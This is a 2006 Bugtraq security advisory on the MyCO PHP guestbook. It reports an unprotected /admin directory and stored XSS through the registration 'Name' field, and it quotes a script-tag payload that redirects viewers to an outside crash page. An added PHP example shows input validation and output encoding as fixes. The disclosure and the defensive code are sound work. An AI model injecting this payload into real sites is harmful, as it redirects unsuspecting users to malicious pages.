Message-ID: <20060131080731.26624.qmail@securityfocus.com>
Date: 31 Jan 2006 08:07:31 -0000
From: revnic@...il.com
To: bugtraq@...urityfocus.com
Subject: MyCO multiple vulnerabilities

MyCO multiple vulnerabilities

Software: MyCO guestbook 1.0
www.punctweb.com

Credit: Revnic Vasile
revnic@...il.com

Description: MyCO is a PHP guestbook that uses a MySQL database

Vulnerability: the /admin directory is accessible by everyone.
XSS can be injected into the field "Name" when registering a new user.

<script>document.location = 'http://some.site/crash_ie.asp';</script>

when viewing members list can redirect user's browser to a malicious site.
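
Added example, not part of the original post and not MyCO's own code: a sketch of how the "Name" field could be validated at registration and encoded when the members list is rendered, run against the string quoted in the advisory. All function names are hypothetical, since the advisory does not show the application's source.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; MyCO's real code is not shown in the advisory.

/** Registration-time check: accept only names matching an allow-list. */
function validate_name(string $name): bool
{
    // Unicode letters, digits, space, dot, underscore, hyphen; 1-40 chars.
    return preg_match('/\A[\p{L}\p{N} ._-]{1,40}\z/u', $name) === 1;
}

/** Output encoding applied when a stored name is written into HTML. */
function render_member_row(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<li>{$safe}</li>";
}

/** The pattern the advisory implies: the stored name is echoed as-is. */
function render_member_row_unsafe(string $name): string
{
    return "<li>{$name}</li>";
}

// Constructed sample input: an ordinary name and the string from the advisory.
$names = [
    'Alice',
    "<script>document.location = 'http://some.site/crash_ie.asp';</script>",
];

foreach ($names as $name) {
    printf("accepted at registration: %s\n", validate_name($name) ? 'yes' : 'no');
    printf("unencoded: %s\n", render_member_row_unsafe($name));
    printf("encoded:   %s\n\n", render_member_row($name));
}
```

Encoding at output is the control that matters for names already stored in the database; the registration check only limits what gets stored from then on.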